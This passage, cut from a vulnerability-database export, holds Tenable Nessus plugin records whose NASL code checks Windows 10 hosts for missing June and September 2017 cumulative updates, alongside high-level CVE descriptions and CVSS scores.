to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8706, CVE-2017-8707, \n CVE-2017-8712,CVE-2017-8713)\n\n - A security feature bypass vulnerability exists when\n Windows Control Flow Guard mishandles objects in memory.\n (CVE-2017-8716)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. (CVE-2017-8720)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. (CVE-2017-8724)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8724, CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft Edge. (CVE-2017-8739)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user.(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2017-8746)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8734, CVE-2017-8751)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content. To\n exploit the bypass, an attacker must trick a user into\n either loading a page containing malicious content or\n visiting a malicious website. The attacker could also\n inject the malicious page into either a compromised\n website or an advertisement network. The update\n addresses the bypass by correcting how the Edge CSP\n validates documents. (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8729, CVE-2017-8740,\n CVE-2017-8752, CVE-2017-8753, CVE-2017-8755,\n CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038788/windows-10-update-kb4038788\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fb942e3e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038788.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038788');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038788])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:29:34", "description": "The remote Windows 10 version 1507 host is missing security update KB4022727. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V instruction emulation due to a failure to properly enforce privilege levels. An attacker on a guest operating system can exploit this to gain elevated privileges on the guest. Note that the host operating system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in Device Guard. A local attacker can exploit these, via a specially crafted script, to bypass the Device Guard Code Integrity policy and inject arbitrary code into a trusted PowerShell process. (CVE-2017-0218, CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in Windows Uniscribe due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory. (CVE-2017-0282, CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in Windows Uniscribe software due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted document, to execute arbitrary code in the context of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in the Windows GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website or open a specially crafted document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289, CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these, by convincing a user to open a specially crafted PDF file, to execute arbitrary code in the context of the current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in Microsoft Windows due to improper handling of cabinet files. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted cabinet file, to execute arbitrary code in the context of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in tdx.sys due to a failure to check the length of a buffer prior to copying memory to it. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the DCOM object in Helppane.exe, when configured to run as the interactive user, due to a failure to properly authenticate the client. An authenticated, remote attacker can exploit this, via a specially crafted application, to run arbitrary code in another user's session after that user has logged on to the same system using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462, CVE-2017-8485)\n\n - An information disclosure vulnerability exists in Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted PDF file, to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows due to improper handling of shortcuts. An unauthenticated, remote attacker can exploit this, by convincing a user to insert a removable drive containing a malicious shortcut and binary, to automatically execute arbitrary code in the context of the current user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit these, via a specially crafted application, to run processes in an elevated context. (CVE-2017-8465, CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in the Windows kernel due to improper initialization of objects in memory. An authenticated, remote attacker can exploit these, via a specially crafted application, to disclose sensitive information. (CVE-2017-8470, CVE-2017-8471, CVE-2017-8473, CVE-2017-8474, CVE-2017-8475, CVE-2017-8476, CVE-2017-8477, CVE-2017-8478, CVE-2017-8479, CVE-2017-8480, CVE-2017-8481, CVE-2017-8482, CVE-2017-8483, CVE-2017-8484, CVE-2017-8489, CVE-2017-8490, CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially crafted application, to bypass Unified Extensible Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the Windows Secure Kernel Mode feature due to a failure to properly handle objects in memory. A local attacker can exploit this, via a specially crafted application, to bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit these, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524, CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly apply the Same Origin Policy for HTML elements. An unauthenticated, remote attacker can exploit this, by convincing a user to follow a link, to load a page with malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the Windows font library due to improper handling of embedded fonts. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft document, to execute arbitrary code in the context of the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in Microsoft Edge due to a failure to properly enforce same-origin policies. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose information from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the Windows Search functionality due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, via a specially crafted SMB message, to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the JavaScript scripting engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the Windows Graphics component due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the Windows Graphics component due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. An authenticated, remote attacker can exploit this, via a specially crafted application, to disclose the contents of memory. (CVE-2017-8554)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-13T00:00:00", "type": "nessus", "title": "KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0193", "CVE-2017-0218", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-0283", "CVE-2017-0284", "CVE-2017-0285", "CVE-2017-0287", "CVE-2017-0288", "CVE-2017-0289", "CVE-2017-0291", "CVE-2017-0292", "CVE-2017-0294", "CVE-2017-0296", "CVE-2017-0297", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0300", "CVE-2017-8460", "CVE-2017-8462", "CVE-2017-8464", "CVE-2017-8465", "CVE-2017-8466", "CVE-2017-8468", "CVE-2017-8470", "CVE-2017-8471", "CVE-2017-8473", "CVE-2017-8474", "CVE-2017-8475", "CVE-2017-8476", "CVE-2017-8477", "CVE-2017-8478", "CVE-2017-8479", "CVE-2017-8480", "CVE-2017-8481", "CVE-2017-8482", "CVE-2017-8483", "CVE-2017-8484", "CVE-2017-8485", "CVE-2017-8489", "CVE-2017-8490", "CVE-2017-8491", "CVE-2017-8492", "CVE-2017-8493", "CVE-2017-8494", "CVE-2017-8517", "CVE-2017-8518", "CVE-2017-8522", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-8527", "CVE-2017-8530", "CVE-2017-8531", "CVE-2017-8532", "CVE-2017-8533", "CVE-2017-8543", "CVE-2017-8544", "CVE-2017-8547", "CVE-2017-8548", "CVE-2017-8549", "CVE-2017-8554", "CVE-2017-8575", "CVE-2017-8576", "CVE-2017-8579"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022727.NASL", "href": "https://www.tenable.com/plugins/nessus/100765", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100765);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n \"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022727\");\n script_xref(name:\"MSFT\", value:\"MS17-4022727\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/14\");\n\n script_name(english:\"KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4022727. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0218,\n CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n 